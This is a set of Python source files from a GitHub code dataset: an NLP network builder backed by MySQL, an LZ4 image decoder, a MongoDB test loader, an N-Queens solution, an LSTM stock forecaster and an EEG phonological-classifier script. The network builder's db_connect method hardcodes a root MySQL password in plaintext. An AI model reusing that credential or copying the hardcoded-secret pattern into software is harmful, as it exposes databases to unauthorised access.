[\"other\"]\n\t\t\t\tif(len(annotation[\"categories\"]) > 0 and annotation[\"categories\"][0] == ''):\n\t\t\t\t\tannotation[\"categories\"] = [\"other\"]\n\t\t\t\tif(annotation[\"Word\"] in self.annotations['word_list']):\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]]['count']+= 1\n\t\t\t\telse:\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]] = annotation.copy()\n\t\t\t\t\tself.annotations['word_list'][annotation[\"Word\"]]['count'] = 1\n\t\t\t\t#store in annotation spot_list\n\t\t\t\tif(annotation[\"spot\"] in self.annotations['spot_list']):\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]]['count']+= 1\n\t\t\t\telse:\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]] = annotation.copy()\n\t\t\t\t\tself.annotations['spot_list'][annotation[\"spot\"]]['count'] = 1\n\t\t\t\t#store in annotation list by article\n\t\t\t\tself.annotations['article'][id_article][annotation[\"start_pos\"]] = annotation.copy();\n\t\t\t\tself.write_log(\"Save annotation: \"+annotation[\"Word\"])\t\n\t\t\texcept Exception as e:\n\t\t\t\tself.write_log(\"Error in save_annotations: \"+str(e))\t\n\t\n\tdef clean_token(self, token):\n\t\ttoken = token.replace('NOT_', 'not ')\n\t\tnot_alpha = re.findall(r'[^a-zA-Z\\d\\s:]', token)\n\t\tif len(not_alpha) > 0 or len(token) < 3:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn token\n\t\n\t############## EDGES 
ANALYSIS ##################\n\t\n\tdef find_edges(self, id_article, sentence, spot_list, total_words):\n\t\tself.write_log(\"FINDING edges for: \"+sentence)\n\t\tdoc = self.nlp(sentence)\n\t\tverbs = {}\n\t\tfor w in doc:\n\t\t\tif w.pos == VERB:\n\t\t\t\tverbs[w.text] = []\n\t\t\t\tself.recoursive_search(w, w.text, verbs, 0)\n\t\tfor v in verbs:\n\t\t\tsub = None\n\t\t\tdob = None\n\t\t\tfor s in spot_list:\n\t\t\t\tfor e in verbs[v]:\n\t\t\t\t\tif s[\"spot\"] in e:\n\t\t\t\t\t\tif sub is not None:\n\t\t\t\t\t\t\tdob = s\n\t\t\t\t\t\t\tif self.passive_form(sentence):\n\t\t\t\t\t\t\t\tself.save_edge(id_article, dob, sub, v, total_words, sentence)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.save_edge(id_article, sub, dob, v, total_words, sentence)\n\t\t\t\t\t\t\tdob = None\n\t\t\t\t\t\tif sub is None:\n\t\t\t\t\t\t\tsub = s\n\t\t\t\t\t\n\tdef recoursive_search(self, el, verb, verbs, count):\n\t\tcount+=1\n\t\tif count > 2:\n\t\t\treturn\n\t\tfor child in el.children:\n\t\t\tverbs[verb].append(child.text)\n\t\t\tself.recoursive_search(child, verb, verbs, count)\n\t\n\tdef passive_form(self, sentence):\n\t\tmatcher = Matcher(self.nlp.vocab)\n\t\tdoc = self.nlp(sentence)\n\t\tpassive_rule = [{'DEP':'nsubjpass'},{'DEP':'aux','OP':'*'},{'DEP':'auxpass'},{'TAG':'VBN'}]\n\t\tmatcher.add('Passive', [passive_rule])\n\t\tmatches = matcher(doc)\n\t\tif len(matches):\n\t\t\treturn True\n\t\treturn False\n\t\t\n\t\n\tdef check_exception(self, sentence):\n\t\t#check parentheses\n\t\tis_an_exception = False\n\t\tparentheses = [\"{\", \"[\", \"(\", \")\", \"]\", \"}\"]\n\t\tif any(x in sentence for x in parentheses):\n\t\t\tresult = regex.search(r'''(?\\((?:[^()]++|(?&rec))*\\))''',sentence,flags=regex.VERBOSE)\n\t\t\tif result is not None:\n\t\t\t\tis_an_exception = False\n\t\t\telse:\n\t\t\t\tis_an_exception = True\n\t\telse:\n\t\t\tis_an_exception = False\n\t\t#check ,\n\t\tif \",\" in sentence or \";\" in sentence:\n\t\t\tis_an_exception = True\n\t\treturn is_an_exception\n\t\n\tdef check_bio_edge(self, edge):\n\t\tscore = len(edge);\n\t\tfor e in self.bioterms:\n\t\t\tif nltk.edit_distance(e, edge) < score:\n\t\t\t\tscore = nltk.edit_distance(e, edge)\n\t\ttry:\n\t\t\tnormalized_score = score/len(edge)\n\t\texcept:\n\t\t\tnormalized_score = 999\n\t\treturn round(normalized_score, 3)\n\t\t\n\t\t\n\tdef save_edge(self, id_article, spot1, spot2, edge_label, total_words, sentence):\n\t\ttry:\n\t\t\tfoundn1 = False\n\t\t\tfoundn2 = False\n\t\t\t# n1 = self.annotations['spot_list'][spot1]['Word']\n\t\t\t# n2 = self.annotations['spot_list'][spot2]['Word']\n\t\t\tn1 = spot1['Word']\n\t\t\tn2 = spot2['Word']\n\t\t\t#self.write_log(\"Saving edges for: \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\tindex_e = -1\n\t\t\tedge_id = hashlib.md5((n1+n2+edge_label).encode('utf-8')).hexdigest()\n\t\t\t#edge\n\t\t\tfor index, edge in enumerate(self.net['edges']):\n\t\t\t\tif(edge['data']['id'] == edge_id):\n\t\t\t\t\tindex_e = index\t\t\n\t\t\tbio = 0\n\t\t\tnew_edge = {\"id\": edge_id, \"source\": n1, \"target\": n2, \"label\": edge_label, \"weight\": 0, \"mrho\": 0, \"bio\": bio}\n\t\t\tif index_e == -1: #edge not found ,new insert\n\t\t\t\tnew_edge['aid'] = {id_article}\n\t\t\t\t#mrho\n\t\t\t\t#new_edge['mrho'] = (float(self.annotations['spot_list'][spot1]['rho'])+float(self.annotations['spot_list'][spot2]['rho']))/2\n\t\t\t\tnew_edge['mrho'] = (float(spot1['rho'])+float(spot2['rho']))/2\n\t\t\t\tnew_edge['tf'] = {}\n\t\t\t\tnew_edge['tf'][id_article] = {'tf': 1, 'total_words': 
total_words}\n\t\t\t\tnew_edge['sentences'] = {}\n\t\t\t\tnew_edge['sentences'][id_article] = []\n\t\t\t\tnew_edge['sentences'][id_article].append(sentence)\n\t\t\t\tself.write_log(\"INSERT edge : \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\t\tself.net['edges'].append({'data': new_edge})\n\t\t\telse:\n\t\t\t\tnew_edge['aid'] = self.net['edges'][index_e]['data']['aid']\n\t\t\t\tnew_edge['aid'].add(id_article)\n\t\t\t\tnew_edge['tf'] = self.net['edges'][index_e]['data']['tf']\n\t\t\t\tnew_edge['sentences'] = self.net['edges'][index_e]['data']['sentences']\n\t\t\t\t#mrho\n\t\t\t\tnew_edge['mrho'] = ((float(spot1['rho'])+float(spot2['rho']))/2 + self.net['edges'][index_e]['data']['mrho'])/2\n\t\t\t\t#TFIDF PARAMETERS\n\t\t\t\tif id_article not in new_edge['tf']:\n\t\t\t\t\tnew_edge['tf'][id_article] = {'tf': 1, 'total_words': total_words}\n\t\t\t\telse:\n\t\t\t\t\tnew_edge['tf'][id_article]['tf']+=1 \n\t\t\t\t#Sentences\n\t\t\t\tif id_article not in new_edge['sentences']:\n\t\t\t\t\tnew_edge['sentences'][id_article] = []\n\t\t\t\tif sentence not in new_edge['sentences'][id_article]:\n\t\t\t\t\tnew_edge['sentences'][id_article].append(sentence)\n\t\t\t\tself.write_log(\"UPDATE edge : \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\t\tself.net['edges'][index_e] = {'data': new_edge}\n\t\t\t\t\n\t\t\t\t\n\t\t\t# Node\n\t\t\tif(n1 == n2):\n\t\t\t\tfoundn2 = True\n\t\t\tfor node in self.net['nodes']:\n\t\t\t\tif (node['data']['label'] == n1):\n\t\t\t\t\tfoundn1 = True\n\t\t\t\t\tnode['data']['size']+=1\n\t\t\t\tif (node['data']['label'] == n2):\n\t\t\t\t\tfoundn2 = True\n\t\t\t\t\tnode['data']['size']+=1\n\t\t\tif not foundn1:\n\t\t\t\tself.net['nodes'].append({'data': {\"id\": n1, \"label\": n1, \"size\": 1, \"spot\": spot1}})\n\t\t\tif not foundn2:\n\t\t\t\tself.net['nodes'].append({'data': {\"id\": n2, \"label\": n2, \"size\": 1, \"spot\": spot2}})\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_edge: \"+str(e))\n\t\t\n\t############## DATABASE ##################\n\t\t\t\n\tdef db_connect(self):\n\t\tself.db = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"tagmetagme85\", database=\"netme\", buffered=True, auth_plugin='mysql_native_password')\t\n\t\n\tdef get_conjunctionterms(self):\n\t\tsql = \"SELECT * FROM netme.conjunctionterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_conjunctionterms: \"+str(e))\n\t\treturn terms\n\t\n\tdef get_negationterms(self):\n\t\tsql = \"SELECT * FROM netme.negationterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_negationterms: \"+str(e))\n\t\treturn terms\n\t\t\n\tdef get_bioterms(self):\n\t\tsql = \"SELECT * FROM netme.bioterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_bioterms: \"+str(e))\n\t\treturn terms\n\t\t\n\tdef get_request(self):\n\t\tsql = \"SELECT * FROM netme.requests WHERE id = %s\"\n\t\tsql_data = (self.searchid,)\n\t\ttry:\n\t\t\tcursor = 
self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_requests: \"+str(e))\n\t\treturn None\n\t\n\tdef get_dump(self):\n\t\tsql = \"SELECT * FROM netme.dumps WHERE id = %s\"\n\t\tsql_data = (self.searchid,)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_dump: \"+str(e))\n\t\treturn None\n\t\n\tdef save_dump(self, text):\n\t\tself.db.reconnect()\n\t\tsql = \"INSERT INTO netme.dumps (id, data) VALUES (%s, %s) ON DUPLICATE KEY UPDATE data = %s, update_on = CURRENT_TIMESTAMP()\"\n\t\tsql_data = (self.searchid, text, text)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tself.db.commit()\n\t\t\tself.db.close()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_dump: \"+str(e))\n\t\treturn False\n\t\n\tdef save_annotations_db(self, id_article, text):\n\t\tsql = \"INSERT INTO netme.annotations (id, id_article, data) VALUES (%s, %s, %s)\"\n\t\tsql_data = (self.searchid, id_article, text)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tself.db.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_annotations_db: \"+str(e))\n\t\treturn False\n\t\t\n\tdef get_annotations(self, id_article):\n\t\tif \"pmc|\" in id_article or \"pubmed|\" in id_article:\n\t\t\t#I can search between id_article directly\n\t\t\tsql = \"SELECT * FROM netme.annotations WHERE id_article = %s\"\n\t\t\tsql_data = (id_article,)\n\t\telse:\n\t\t\tsql = \"SELECT * FROM netme.annotations WHERE id = %s AND id_article = %s\"\n\t\t\tsql_data = (self.searchid, id_article)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_annotations: \"+str(e))\n\t\treturn None\n\t\n\t############## LOG ##################\n\t\t\n\tdef reset_log(self):\n\t\tlogfile_path = self.path+\"logs/\"+self.searchid\n\t\tif(os.path.exists(logfile_path)):\n\t\t\tos.remove(logfile_path)\n\t\t\n\tdef write_log(self, text):\n\t\ttry:\n\t\t\tlogfile_path = self.path+\"logs/\"+self.searchid\n\t\t\tfile = open(logfile_path, 'a') \n\t\t\ttime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\ttext = time + \":\\t\\t\" + text + \"\\n\"\n\t\t\tfile.write(text) \n\t\t\tfile.close() \n\t\t\tif(self.debug):\n\t\t\t\tprint(text+ \"\\n\")\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\t\nn = NetBuilder();\n","repo_name":"alemuscolino/netme","sub_path":"py/netbuilder.py","file_name":"netbuilder.py","file_ext":"py","file_size_in_byte":24171,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"29116293084","text":"from PIL import Image\nimport sys\nimport io\nimport lz4.block\nimport os\n\ndef b2i(b):\n return int.from_bytes(b, byteorder=\"little\")\n\ndef save_to_png(width, height, data, filename):\n img = Image.frombytes('RGBA', (width,height), data)\n img.save(sys.argv[2])\n\ndef main():\n with open(sys.argv[1], \"rb\") as f:\n magic = f.read(0x04)\n bpp = f.read(0x04)\n width = f.read(0x04)\n height = f.read(0x04)\n 
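# Header layout as read in this function: magic, bpp, width, height, size and\n        # zsize, six consecutive 4-byte little-endian fields, then the LZ4 payload.\n        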
size = f.read(0x04)\n zsize = f.read(0x04)\n data = f.read(b2i(zsize))\n \n decompressed = io.BytesIO(lz4.block.decompress(data, uncompressed_size=b2i(size)))\n \n size = decompressed.read(0x04)\n zsize = decompressed.read(0x04)\n data = decompressed.read(b2i(zsize))\n\n decompressedf = lz4.block.decompress(data, uncompressed_size=b2i(size))\n\n save_to_png(b2i(width), b2i(height), decompressedf, os.path.basename(sys.argv[1]))\n\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Konosprod/fantastic-engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70257466490","text":"from mongo_to_geojson.tests.test_config import COLLECTION, MONGO_URI\nfrom pymongo import MongoClient\nimport click\nimport json\nimport os\nimport tempfile\n\n\ndef get_temp_jsonfile_path():\n '''\n Returns a valid temp json file path without having created it\n :return:\n '''\n return os.path.join(tempfile.gettempdir(), next(tempfile._get_candidate_names()) + \".json\")\n\n\ndef create_parameter_file_input(parameter):\n '''\n creates a temp json file and dumps a parameter into it\n :param parameter: parameter from test_config.py\n :return: file path containing parameter data\n '''\n parameter_file_path = get_temp_jsonfile_path()\n with open(parameter_file_path, 'w') as f:\n json.dump(parameter, f)\n return parameter_file_path\n\n@click.command()\ndef load_test_data():\n '''\n Atempts to load a Mongo DB with test data using parameters in test_config. A couple\n of conditions need to be met in order for this to work:\n 1. the collection as specified in test_config.py COLLECTION variable has been exported using\n mongoexport (with --jsonArray flag) into mongo_to_geojson.tests.data folder with naming\n convention COLLECTION.json\n :return:\n '''\n collection_json_array_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),'data', '{0}.json'.format(COLLECTION))\n with open(collection_json_array_file, 'r') as i:\n data = json.load(i)\n\n client = MongoClient(MONGO_URI)\n db = client.get_database()\n db[COLLECTION].insert_many(data)\n\n\nif __name__ == '__main__':\n load_test_data()","repo_name":"madnut-ua/mongo2geojson","sub_path":"mongo_to_geojson/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099591969","text":"class Solution:\n n=0\n cur=[]\n ans=[]\n def solveNQueens(self, n: int) -> List[List[str]]:\n self.n=n\n self.cur=[-1 for i in range(n)]\n self.ans=[]\n self.dfs(0)\n return self.ans\n \n def dfs(self,i:int):\n for j in range(self.n):\n found = False\n for k in range(i):\n if self.cur[k]==j:\n found = True\n break\n if abs(self.cur[k]-j)==abs(i-k):\n found = True\n break\n if found:\n continue\n self.cur[i]=j\n if i==(self.n-1):\n # print(self.cur)\n tmp=[]\n for k in range(self.n):\n tmp.append(\".\"*self.cur[k]+\"Q\"+\".\"*(self.n-self.cur[k]-1))\n self.ans.append(tmp)\n self.cur[i]=-1\n return\n self.dfs(i+1)\n self.cur[i]=-1\n return ","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/51. N-Queens.py","file_name":"51. 
N-Queens.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41114231087","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 19:10:43 2021\n\n@author: sunbeam\n\"\"\"\n\nimport plotly.graph_objects as go\n\nimport plotly.io as pio\n#pio.renderers.default = 'svg'\npio.renderers.default = 'browser'\nimport pandas as pd\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom datetime import datetime\n\ndf = pd.read_csv(\"/home/sunbeam/Documents/STOCK_DATASETS_FINAL/AAPL.csv\",parse_dates=[0])\n\nprint(df)\npre_date =pd.Series(pd.date_range(datetime.today(), periods=30))\nx = df['Date']\ny = df['Close']\n\npre_date.shape\n\nx.shape\ny.shape\n\ninput_data_date = df.Date[len(df)-100:]\ninput = df.Close\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler=MinMaxScaler(feature_range=(0,1))\ndf1=scaler.fit_transform(np.array(input).reshape(-1,1))\n\n#input_data = np.array(df1[len(df1)-100-1:len(df1)-1]).reshape(-1,1)\ninput_data = np.array(df1[len(df1)-100:]).reshape(-1,1)\nprint(df1[-1])\nprint(input_data)\nprint(len(input_data))\n\n\nmodel = keras.models.load_model('my_time_series_model.h5')\n\npredictions = model.predict(np.array(input_data).reshape(1,-1).reshape((1,100,1)))\n\nprint(scaler.inverse_transform(predictions))\n\nx_input = np.array(input_data[:]).reshape(1,-1)\nx_input.shape\n\ntemp_input = list(x_input)\ntemp_input=temp_input[0].tolist()\n\n\n# demonstrate prediction for next 10 days\nfrom numpy import array\n\nlst_output=[]\nn_steps=100\ni=0\nwhile(i<30):\n \n if(len(temp_input)>100):\n #print(temp_input)\n x_input=np.array(temp_input[1:])\n print(\"{} day input {}\".format(i,x_input))\n x_input=x_input.reshape(1,-1)\n x_input = x_input.reshape((1, n_steps, 1))\n #print(x_input)\n yhat = model.predict(x_input, verbose=0)\n print(\"{} day output {}\".format(i,yhat))\n temp_input.extend(yhat[0].tolist())\n temp_input=temp_input[1:]\n #print(temp_input)\n lst_output.extend(yhat.tolist())\n i=i+1\n else:\n x_input = x_input.reshape((1, n_steps,1))\n yhat = model.predict(x_input, verbose=0)\n print(yhat[0])\n temp_input.extend(yhat[0].tolist())\n print(len(temp_input))\n lst_output.extend(yhat.tolist())\n i=i+1\n \n\nprint(lst_output)\nfinal_y = scaler.inverse_transform(lst_output).reshape(1,-1).tolist()[0]\n\nfig = go.Figure(data=go.Scatter(x=pre_date, y=final_y, mode='markers'))\n\nfig.show()","repo_name":"greatgreek9/flask_time_series","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39878154567","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\"\"\"\n===============================================================================\nScript 'make-confmats-from-classifier-output.py'\n===============================================================================\n\nThis script converts output from a series of binary phonological feature\nclassifiers into segment probabilities formatted as a confusion matrix.\n\"\"\"\n# @author: drmccloy\n# Created on Wed Apr 6 12:43:04 2016\n# License: BSD (3-clause)\n\n\nfrom __future__ import division, print_function\nimport yaml\nimport json\nimport numpy as np\nimport os.path as op\nfrom os import mkdir\nfrom pandas import Series, DataFrame, read_csv, concat\nfrom numpy import logical_not as negate\nfrom aux_functions import 
find_EER_threshold\n\n# flags\nadd_missing_feats = False\nuse_eng_superset = False\n\n# file i/o\nparamdir = 'params'\noutdir = 'processed-data'\nanalysis_params = 'current-analysis-settings.yaml'\nif not op.isdir(outdir):\n mkdir(outdir)\n\n# load analysis params\nwith open(op.join(paramdir, analysis_params), 'r') as paramfile:\n params = yaml.safe_load(paramfile)\nclf_type = params['clf_type']\nuse_dss = params['dss']['use']\nn_dss_channels_to_use = params['dss']['use_n_channels']\nprocess_individual_subjs = params['process_individual_subjs']\nfname_suffix = '-dss-{}'.format(n_dss_channels_to_use) if use_dss else ''\nsquaremat = '' if use_eng_superset else '-square'\nfname_id = '{}{}'.format(clf_type, fname_suffix)\n\n\ndef compute_classifier_scores_from_probs(featprob):\n # use probabilities as scores\n pos_class = featprob.columns[[x.startswith('+') for x in featprob.columns]]\n featscore = featprob[pos_class]\n featscore.index = [ipa[x] for x in featscore.index] # convert to IPA\n featscore.columns = [x[1:] for x in featscore.columns] # remove +/- sign\n assert len(featscore.columns) == len(np.unique(featscore.columns))\n # ground truth\n feattruth = DataFrame([feat_ref.loc[seg] for seg in featscore.index])\n return featscore, feattruth\n\n\ndef add_missing_feat_EERs(featscore, equal_error_rate):\n # add EER of 0.5 for all missing features\n missing_feats = feat_tab.columns[np.in1d(feat_tab.columns,\n featscore.columns, invert=True)]\n equal_error_rate = np.r_[equal_error_rate,\n 0.5 * np.ones(missing_feats.size)]\n equal_error_rate = Series(equal_error_rate,\n index=np.r_[featscore.columns, missing_feats])\n return missing_feats, equal_error_rate\n\n\ndef add_missing_feats_to_ref(feat_ref, missing_feats):\n z = np.zeros((feat_ref.shape[0], missing_feats.size), dtype=int)\n missing_df = DataFrame(z, columns=missing_feats, index=feat_ref.index)\n return concat((feat_ref, missing_df), axis=1)\n\n\ndef make_weights_matrix(equal_error_rate, foreign, english):\n # make binary mask of feature matches: shape=(foreign_cons, eng_cons, feat)\n # 1. add 1 to remap binary feature values as 1 (absence) or 2 (presence)\n # 2. multiply each English phone's feature value with each foreign one\n # 3. if product is 1 or 4 then feats. match, if product is 2 then mismatch\n mask = np.einsum('ik,jk->ijk', 1 + foreign, 1 + english) != 2\n # convert equal_error_rate to (1 - equal_error_rate) when features match\n # (this yields probability of \"correct\" classification for each feature\n # when considering feature values of each English phone as a prior)\n feat_prob_mat = np.abs(mask.astype(int) - equal_error_rate.values)\n # aggregate feature classif. probs. into phone classif. 
probs.\n weights_matrix = np.exp(-np.sum(-np.log(feat_prob_mat), axis=-1))\n return weights_matrix\n\n\n# load ancillary data\nlangs = np.load(op.join(paramdir, 'langs.npy'))\nsubj_dict = np.load(op.join(paramdir, 'subjects.npz'))\nwith open(op.join(paramdir, 'ascii-to-ipa.json'), 'r') as f:\n ipa = json.load(f)\nfeat_path_eng = op.join(paramdir, 'reference-feature-table-english.tsv')\nfeat_ref_eng = read_csv(feat_path_eng, sep='\\t', index_col=0, encoding='utf-8')\nfeat_ref_all = read_csv(op.join(paramdir, 'reference-feature-table-all.tsv'),\n sep='\\t', index_col=0, encoding='utf-8')\nfeat_ref = read_csv(op.join(paramdir, 'reference-feature-table-cons.tsv'),\n sep='\\t', index_col=0, encoding='utf-8')\n# this sort order is for the classifier features only\nsort_by = ['consonantal', 'labial', 'coronal', 'dorsal', 'continuant',\n 'sonorant', 'periodicGlottalSource', 'distributed', 'strident']\nfeat_ref_cons = feat_ref.sort_values(by=sort_by, ascending=False)\nfeat_ref_all = feat_ref_all.sort_values(by=sort_by, ascending=False)\nfeat_ref_eng = feat_ref_eng.sort_values(by=sort_by, ascending=False)\nfeat_ref = feat_ref_all\n# convert to binary if needed\nif isinstance(feat_ref.iloc[0, 0], (str, unicode)):\n feat_ref = feat_ref.apply(lambda x: x == '+').astype(int)\n# load each language's phone sets\nwith open(op.join(paramdir, 'phonesets.json'), 'r') as f, \\\n open(op.join(paramdir, 'allphones.json'), 'r') as g:\n phonesets = json.load(f)\n all_phones = json.load(g)\nif use_eng_superset:\n with open(op.join(paramdir, 'eng-phones-superset.json'), 'r') as f:\n eng_phones = json.load(f)\nelse:\n eng_phones = phonesets['eng']\n\n# read in PHOIBLE feature data\nfeat_tab = read_csv(op.join(paramdir, 'phoible-segments-features.tsv'),\n sep='\\t', encoding='utf-8', index_col=0)\nfeat_tab = feat_tab.loc[all_phones]\nassert feat_tab.shape[0] == len(all_phones)\n\n# eliminate redundant features\nvacuous = feat_tab.apply(lambda x: len(np.unique(x)) == 1).values\nprivative = feat_tab.apply(lambda x: len(np.unique(x)) == 2 and\n '0' in np.unique(x)).values\nfeat_tab = feat_tab.iloc[:, negate(vacuous | privative)]\n\n# add 'syllabic' to beginning of sort order to group vowels together\nfeat_tab = feat_tab.sort_values(by=sort_by, ascending=False)\n\n# init some containers\nfeatscores = dict()\nweights_mats = dict()\nequal_error_rates = DataFrame()\n\n# iterate over languages\nfor lang in langs:\n # load classification results\n fname = 'classifier-probabilities-{}-{}.tsv'.format(lang, fname_id)\n fpath = op.join(outdir, fname)\n featprob = read_csv(fpath, sep='\\t', index_col=0)\n # use probabilities as scores\n featscore, feattruth = compute_classifier_scores_from_probs(featprob)\n featscores[lang] = featscore\n # find threshold for each feat to equalize error rate\n thresholds = np.zeros_like(featscore.columns, dtype=float)\n equal_error_rate = np.zeros_like(featscore.columns, dtype=float)\n for ix, feat in enumerate(featscore.columns):\n label = ' ({}: {})'.format(lang, feat)\n (thresholds[ix],\n equal_error_rate[ix]) = find_EER_threshold(featscore[feat],\n feattruth[feat], label)\n \"\"\"\n # check thresholds are actually yielding equal error rates\n predictions = (featscore >= thresholds).astype(int)\n false_pos = (predictions.values & negate(feattruth.values)).sum(axis=0)\n false_neg = (negate(predictions.values) & feattruth.values).sum(axis=0)\n assert np.array_equal(false_pos, false_neg)\n # calculate equal error rates for each feature\n equal_error_rate = false_pos / predictions.shape[0]\n \"\"\"\n 
if add_missing_feats:\n        (missing_feats,\n         equal_error_rate) = add_missing_feat_EERs(featscore, equal_error_rate)\n        feat_ref_expanded = add_missing_feats_to_ref(feat_ref, missing_feats)\n    else:\n        equal_error_rate = Series(equal_error_rate, index=featscore.columns)\n        feat_ref_expanded = feat_ref\n    # propagate add'l features to english feature table\n    feat_ref_eng_expanded = feat_ref_expanded.loc[eng_phones]\n    # create confusion matrix\n    feat_ref_foreign = feat_ref_expanded.loc[phonesets[lang]]\n    # aggregate feature classif. probs. into phone classif. probs.\n    weights_matrix = make_weights_matrix(equal_error_rate, feat_ref_foreign,\n                                         feat_ref_eng_expanded)\n    # save to global variables\n    equal_error_rates[lang] = equal_error_rate\n    weights_mats[lang] = DataFrame(weights_matrix, index=phonesets[lang],\n                                   columns=eng_phones)\n# save results\neer_fname = 'equal-error-rates-{}{}.tsv'.format(fname_id, squaremat)\nequal_error_rates.to_csv(op.join(outdir, eer_fname), sep='\\t')\nfor lang, wmat in weights_mats.items():\n    confmat_fname = 'eeg-confusion-matrix-{}-{}{}.tsv'.format(lang, fname_id,\n                                                              squaremat)\n    wmat.to_csv(op.join(outdir, confmat_fname), sep='\\t', encoding='utf-8')\n\n# process individual subjects\nif process_individual_subjs:\n    for subj_id in subj_dict.keys():\n        subj_outdir = op.join(outdir, subj_id)\n        # init some containers\n        featscores = dict()\n        weights_mats = dict()\n        equal_error_rates = DataFrame()\n        print('processing subject {}'.format(subj_id))\n        for lang in langs:\n            fid = '{}-{}'.format(lang, fname_id)\n            # load classification results\n            fname = ('classifier-probabilities-{}-{}.tsv'.format(fid, subj_id))\n            if op.exists(op.join(subj_outdir, fname)):\n                featprob = read_csv(op.join(subj_outdir, fname), sep='\\t',\n                                    index_col=0)\n                # use probabilities as scores\n                featscore, feattruth = \\\n                    compute_classifier_scores_from_probs(featprob)\n                featscores[lang] = featscore\n                # find threshold for each feat to equalize error rate\n                thresholds = np.zeros_like(featscore.columns, dtype=float)\n                equal_error_rate = np.zeros_like(featscore.columns,\n                                                 dtype=float)\n                for ix, feat in enumerate(featscore.columns):\n                    label = ' ({}: {})'.format(lang, feat)\n                    (thresholds[ix], equal_error_rate[ix]) = \\\n                        find_EER_threshold(featscore[feat], feattruth[feat],\n                                           label)\n                \"\"\"\n                # check thresholds are actually yielding equal error rates\n                predictions = (featscore >= thresholds).astype(int)\n                false_pos = (predictions.values & negate(feattruth.values)\n                             ).sum(axis=0)\n                false_neg = (negate(predictions.values) & feattruth.values\n                             ).sum(axis=0)\n                assert np.array_equal(false_pos, false_neg)\n                # calculate equal error rates for each feature\n                equal_error_rate = false_pos / predictions.shape[0]\n                \"\"\"\n                if add_missing_feats:\n                    missing_feats, equal_error_rate = \\\n                        add_missing_feat_EERs(featscore, equal_error_rate)\n                    feat_ref_expanded = \\\n                        add_missing_feats_to_ref(feat_ref, missing_feats)\n                else:\n                    equal_error_rate = Series(equal_error_rate,\n                                              index=featscore.columns)\n                    feat_ref_expanded = feat_ref\n                # propagate add'l features to english feature table\n                feat_ref_eng_expanded = feat_ref_expanded.loc[eng_phones]\n                # create confusion matrix\n                feat_ref_foreign = feat_ref_expanded.loc[phonesets[lang]]\n                # aggregate feature classif. probs. into phone classif. 
